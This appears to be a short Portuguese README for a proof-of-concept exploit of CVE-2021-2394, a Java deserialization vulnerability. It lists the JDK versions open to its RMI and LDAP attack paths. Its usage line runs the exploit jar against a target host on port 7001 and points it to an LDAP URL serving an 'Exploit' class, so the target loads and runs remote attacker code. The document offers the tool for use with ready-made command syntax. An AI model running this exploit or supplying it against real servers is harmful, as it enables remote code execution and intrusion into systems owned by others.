
POC da CVE-2021-2394
POC do CVE-2021-2394
Observações
O método de exploração baseado em RMI é limitado às versões do JDK anteriores a 6u132, 7u131 e 8u121. Nas versões 8u122 e posteriores, foi adicionado o mecanismo de lista de permissões (whitelist) de desserialização, desativando o carregamento remoto de código RMI. O método de exploração baseado em LDAP é limitado às versões do JDK anteriores a 6u211, 7u201, 8u191 e 11.0.1. Na versão 8u191, a Oracle impôs restrições ao vetor LDAP, publicou o CVE-2018-3149 e desativou o carregamento remoto de classes JNDI. Fonte: https://www.freebuf.com/vuls/279465.html
Modo de uso:
java -jar CVE_2021_2394.jar rhost rport ldapurljava -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/ExploitLinks de referência:
Atualizações
Artigo de análise